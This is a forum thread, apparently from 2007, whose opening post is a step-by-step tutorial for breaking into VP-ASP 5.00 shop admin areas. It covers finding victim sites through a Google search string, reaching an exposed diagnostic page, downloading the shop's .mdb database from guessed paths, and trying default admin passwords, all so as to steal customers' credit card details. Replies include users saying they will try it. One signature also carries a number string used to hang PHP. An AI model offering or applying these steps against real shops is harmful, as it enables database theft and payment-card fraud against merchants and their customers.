Page 1 of 2 12 LastLast
Results 1 to 10 of 19

Thread: How to hack ASP Shopadmins within minutes

  1. #1
    tarch
    Guest

    How to hack ASP Shopadmins within minutes

    This guide should be used purely for knowlage, and not used for exploiting or hacking in any shape or form


    SHOPADMINS ARE OF DIFFERENT COMPANIES LIKE : VP-ASP , X CART .. ETC ETC. I'M POSTING THIS TUTORIAL ON HACKING VP-ASP SHOPADMINS.

    Have you ever went to purchase something on the internet and you needed to enter your credit card information? I'm sure you have. Whether it had been porn, an Ipod, a laptop or anything. Below I'm posting how to hack into the database that holds this information from past customers. If the version of ASP shopadmin is correct, you can eaisly hack into it and steal credit card information, secret company/client information. Please note that huge shops like Amazon, etc use different software and aren't stupid enough to have their shopadmins exploited so easily.

    ---------------------

    The type of shopadmin you will be looking for is VP-ASP Shopping Cart Version 5.00

    Now, how do you find these? Well, I'm sure you've been told Google is your friend plenty of times, and it's extremely useful in this scenario.

    Go to Google.com and type this;
    intitle: VP-ASP Shopping Cart 5.00
    You will find many websites with VP-ASP 5.00 cart software installed. Just pick a random one, on a random page. Remember that alot of these would of already been exploited, so try one on like page 1000 . Now you need to exploit it!

    The page will look like this...> ****://***.victim.com/shop/shopdisplaycategories.asp
    The exploit is : diag_dbtest.asp
    So do this>
    ****://***.victim.com/shop/diag_dbtest.asp

    A page will come up that shows:


    atabase
    shopping140 (140 being the number of products in the shop which is helpful to know if you're hacking a big website)

    blocation
    resx

    xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber (Example)
    The most important thing here is atabase

    atabase: shopping140

    Ok now the URL will be like this:

    ****://***.victim.com/shop/shopping140.mdb
    continue 04/02/2007 22:53
    If you didn't /can't download the database, try this while there is dblocation.

    blocation
    resx

    Now the URL will be this...

    ****://***.victim.com/shop/resx/shopping140.mdb

    If you see an error message, try this.

    ****://***.victim.com/shop/shopping500.mdb

    Download the mdb file and you should be able to open it with any mdb file viewer. Find one at download.com or use MS Office or whatever.

    Now you are inside the shop, look for credit card information and usually the shopadmin username and password.

    The admin login page is usually located here..

    ****://***.victim.com/shop/shopadmin.asp

    If you can't find the MDB or the shopadmin login, try all the default passwords, seriously, some people ARE this stupid.

    Username: admin
    password: admin
    OR
    Username: vpasp
    password: vpasp

    ---------------------

    I hope you enjoyed the guide.
    Last edited by tarch; 10-09-2007 at 01:44 AM.

  2. #2
    Level 2
    Pepsi's Avatar
    Join Date
    Feb 2007
    Location
    New York
    Gender
    Male
    Posts
    696
    NeoSim
    1.89
    SW Level
    1
    SW Kills
    2
    Thanks
    31
    Thanked 30 Times in 23 Posts
    Downloads
    70
    Uploads
    0
    Mentioned
    1 Post(s)
    Rep Points
    136
    Rep Blips
    Time Spent Online:
    3 Weeks 3 Days 20 Hours 34 Minutes 55 Seconds
    Feedback Score
    21 (100%)
    Scammer Status
    Clean
    Middleman Status
    really interesting have you tried it? How do you know this works?



    Guides


    Currently Selling
    Nothing!!


    I ONLY HAVE AIM AND I WILL NOT GET MSN!


  3. #3
    See Ban Reason
    Jon.'s Avatar
    Join Date
    Jun 2007
    Location
    Maryland :D
    Gender
    Male
    Posts
    2,007
    NeoSim
    2.93
    SW Level
    1
    SW Kills
    0
    Thanks
    1,480
    Thanked 1,261 Times in 583 Posts
    Downloads
    423
    Uploads
    0
    Mentioned
    0 Post(s)
    Rep Points
    649
    Rep Blips
    Time Spent Online:
    1 Year 3 Months 5 Days 9 Hours 58 Minutes 35 Seconds
    Feedback Score
    34 (100%)
    Scammer Status
    Clean
    Middleman Status
    I dunno if I really want to try this :P I dun wanna get like, arrested
    But it seems nice. ^_^ I shall try it at my mom's house.
    I googled the first part of it, and seems easy enough to follow.

  4. #4
    used to be moon_cake
    Kelsey's Avatar
    Join Date
    May 2007
    Location
    Behind you... :P
    Gender
    Female
    Posts
    1,480
    NeoSim
    2.04
    Thanks
    58
    Thanked 33 Times in 24 Posts
    Downloads
    61
    Uploads
    0
    Mentioned
    0 Post(s)
    Rep Points
    248
    Rep Blips
    Time Spent Online:
    1 Week 16 Hours 45 Minutes 58 Seconds
    Feedback Score
    21 (100%)
    Scammer Status
    Clean
    Middleman Status
    It's kinda confusing. =/
    I dunno. Sounds cool until ur the one who gets hacked. O.o



    CHRIS COLFER AND KURT HUMMEL! :D <3 <3 <3
    EEEEEP! Thank you Pookie!

    KURT HUMMEL



  5. #5
    tarch
    Guest
    Well yeah of course it works, and I wouldn't know unless I tried it. I have a few programs that do this automatically for you, but they're not free nor for sale .

  6. #6
    Humpty Dumpty was PUSHED!
    AliaSky's Avatar
    Join Date
    Jul 2007
    Location
    Midwest of the US
    Age
    45
    Gender
    Female
    Posts
    1,353
    NeoSim
    0
    Thanks
    3
    Thanked 15 Times in 9 Posts
    Downloads
    26
    Uploads
    0
    Mentioned
    0 Post(s)
    Rep Points
    470
    Rep Blips
    Time Spent Online:
    15 Hours 15 Minutes 7 Seconds
    Feedback Score
    20 (100%)
    Scammer Status
    Clean
    Middleman Status
    Well, I will be using this to learn which shops to NOT shop from. I can tell you that.

    If nothing else, thank you for pointing out this little fail in the system.
    Dreams pass as softly as the night, catch one while you can..
    The good old days weren't always good...tomorrow ain't as bad as it seems
    Sig and avii by Juggernort...thank you!
    It is not death that a man should fear, but he should fear never beginning to live. Marcus Aurelius.
    Earned MOTM Oct '07 Thanks to the wonderful members of this forum. You all rock!!!

  7. #7
    I'm teh Pr0nstarter!
    Razzgirl's Avatar
    Join Date
    Jul 2007
    Location
    The Netherlands
    Age
    35
    Gender
    Female
    Posts
    4,772
    NeoSim
    -1
    SW Level
    1
    SW Kills
    0
    Thanks
    314
    Thanked 612 Times in 307 Posts
    Downloads
    20
    Uploads
    0
    Mentioned
    0 Post(s)
    Rep Points
    1032
    Rep Blips
    Time Spent Online:
    2 Months 3 Weeks 20 Hours 26 Minutes 31 Seconds
    Feedback Score
    30 (100%)
    Scammer Status
    Clean
    Middleman Status
    That's what I'm thinking Aliasky. I won't be putting my cc info into any shops that use that


    http://www.becomingbliss.com


    Had a Northern lad, well not exactly had.
    He moved like the sunset. God who painted that?
    First he loved my accent - how his knees would bend.
    I thought we'd be okay; me and my molasses.
    But I feel something is wrong, but I feel his cake just isn't done.
    Don't say that you don't. And if you could see me now.
    Said if you could see me now.
    Girls you've got to know when it's time to turn the page
    When you're only wet because of the rain.





    callum has raped your siggy

  8. #8
    tarch
    Guest
    Then don't use any site except Amazon :P

  9. #9
    Powerof_one
    Guest
    Yes this works due to people not bein dilligent in their use of bot exclusion files. lazy sods
    So google index's the pages it also works for other things :P

  10. #10
    Level 4



    starly's Avatar
    Join Date
    Apr 2007
    Gender
    Male
    Posts
    2,970
    NeoSim
    2.51
    SW Level
    1
    SW Kills
    2
    Thanks
    251
    Thanked 618 Times in 378 Posts
    Downloads
    104
    Uploads
    5
    Mentioned
    1 Post(s)
    Rep Points
    1159
    Rep Blips
    Time Spent Online:
    2 Months 3 Weeks 3 Days 7 Hours 49 Minutes 49 Seconds
    Feedback Score
    11 (100%)
    Scammer Status
    Clean
    Middleman Status
    lol, this exploit is so easy to patch. every site that is open to exploit this has to be really bullshit :D

    and bot exclusion doesn't make a difference, lmao
    eat that php: 2.2250738585072011e-308




Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Hack sites anyone?
    By Kailey in forum Maplestory
    Replies: 2
    Last Post: 05-12-2007, 05:16 PM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •